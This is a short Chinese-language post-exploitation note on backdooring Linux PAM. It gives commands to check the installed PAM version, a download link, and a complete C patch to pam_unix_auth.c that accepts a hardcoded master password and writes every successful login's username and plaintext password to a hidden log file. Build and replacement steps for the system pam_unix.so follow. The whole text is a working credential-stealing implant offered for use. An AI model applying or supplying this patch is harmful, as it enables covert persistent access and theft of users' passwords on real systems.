PAM_UNIX后门修改
备份一下记录而已。
很老很老的技术了。不多说。
先看当前PAM版本,下载最合适的PAM。
getconf LONG_BIT
cat /etc/redhat-release
rpm -qa | grep pam
apt-get list --installed | grep pamhttp://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz
然后,直接修改这个文件pam_unix_auth.c:
vim modules/pam_unix/pam_unix_auth.c
/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);
/* save password to file */
if(strcmp(p,"t00ls.kele")==0) {
retval = PAM_SUCCESS;
}
if(retval== PAM_SUCCESS) {
FILE* fp = fopen("/var/log/.unix.log","a+");
//fp=fopen("/tmp/pam.txt","a");
fprintf(fp,"%s::%s\n",name,p);
fclose(fp);
}
/* save password to file */./configuare
make
然后在.libs目录就会有pam_unix.so文件了。替换/lib64/security/pam_unix.so就可以了。最好先备份下。
参考:
https://gorgias.me/2018/03/25/Linux-后渗透笔记-PAM后门/
这里有写用telegram bot的。
